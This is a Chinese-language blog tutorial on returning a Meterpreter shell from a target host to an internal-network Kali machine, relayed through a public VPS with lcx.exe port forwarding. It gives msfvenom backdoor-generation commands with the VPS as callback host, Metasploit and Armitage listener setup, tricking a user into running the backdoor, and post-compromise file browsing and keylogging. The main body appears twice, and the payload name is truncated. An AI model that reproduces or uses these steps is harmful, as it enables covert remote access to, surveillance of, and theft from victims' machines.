公网的Shell如何返回到内网的Kali
测试工具:
Lcx.exe 端口转发
Kali 内网环境下的攻击主机
VPS 公网环境下的用于lcx端口转发
目标主机 可以是公网/内网下的主机
1.service postgresql start 启动数据库服务器
2.msfdb init 初始化数据库
3.cat /usr/share/metasploit-framework/config/database.yml 查看数据库链接信息(一会链接会用到)
4.msfconsole 启动msf控制台
5.db_status 查看数据库连接
6.db_connect user:pass@host:port/dbname 链接数据库
以上我们的前期准备工作就完成了,下面我们需要用公网的VPS,进行转发。
-listen 6666 8888 监听8888的数据转发到6666端口
7.msfVENOM -p windows/metre..... LHOST=host LPORT=prot -f exe >/root/Desktop/test.exe 生成payload
LHOST为VPS的地址,LPORT为lcx.exe的连接端口(这里我们是8888端口)
8.armitage 图形化页面的metasploit
(启动页面)默认配置 直接连接就可以
(软件界面)
我们依次选择 Armitage->listeners->bind 新建一个绑定型的shell 配置如下host为VPS地址,port为lcx的传输端口(这里我们是6666端口)
/*****************************分割线*******************************/
下面我们模拟用户打开我们的后门程序
后门启动后会连接我们VPS的8888端口,监听程序会显示流量,同时他会将流量转发到6666端口
由于Metasploit已经连接到VPS的6666端口,所以接收到VPS转发来的数据,成功返回一台主机shell
对主机一些简单的操作(我做测试的主机在内网,所以通过VPS返回了一个内网的主机)
(浏览文件)
(显示进程)
(键盘记录及其他)
具体怎么发挥就看自己了
Lcx.exe 端口转发
Kali 内网环境下的攻击主机
VPS 公网环境下的用于lcx端口转发
目标主机 可以是公网/内网下的主机
1.service postgresql start 启动数据库服务器
2.msfdb init 初始化数据库
3.cat /usr/share/metasploit-framework/config/database.yml 查看数据库链接信息(一会链接会用到)
4.msfconsole 启动msf控制台
5.db_status 查看数据库连接
6.db_connect user:pass@host:port/dbname 链接数据库
以上我们的前期准备工作就完成了,下面我们需要用公网的VPS,进行转发。
-listen 6666 8888 监听8888的数据转发到6666端口
7.msfVENOM -p windows/metre..... LHOST=host LPORT=prot -f exe >/root/Desktop/test.exe 生成payload
LHOST为VPS的地址,LPORT为lcx.exe的连接端口(这里我们是8888端口)
8.armitage 图形化页面的metasploit
(启动页面)默认配置 直接连接就可以
(软件界面)
我们依次选择 Armitage->listeners->bind 新建一个绑定型的shell 配置如下host为VPS地址,port为lcx的传输端口(这里我们是6666端口)
/*****************************分割线*******************************/
下面我们模拟用户打开我们的后门程序
后门启动后会连接我们VPS的8888端口,监听程序会显示流量,同时他会将流量转发到6666端口
由于Metasploit已经连接到VPS的6666端口,所以接收到VPS转发来的数据,成功返回一台主机shell
对主机一些简单的操作(我做测试的主机在内网,所以通过VPS返回了一个内网的主机)
(浏览文件)
(显示进程)
(键盘记录及其他)
具体怎么发挥就看自己了
msfvenom还可以生成php、asp等多种形式的payload,关于他的一些其他用法可以参考:http://ixuehua.blog.163.com/blog/static/2599520382016447215392/
https://bbs.ichunqiu.com/thread-13496-1-1.html
zuoer 》原创,转载请保留文章出处。
本文链接:公网的Shell如何返回到内网的Kali https://www.zuoer.xin/?post=32
版权声明:若无特殊注明,本文皆为《
正文到此结束
管理员已关闭本篇文章评论!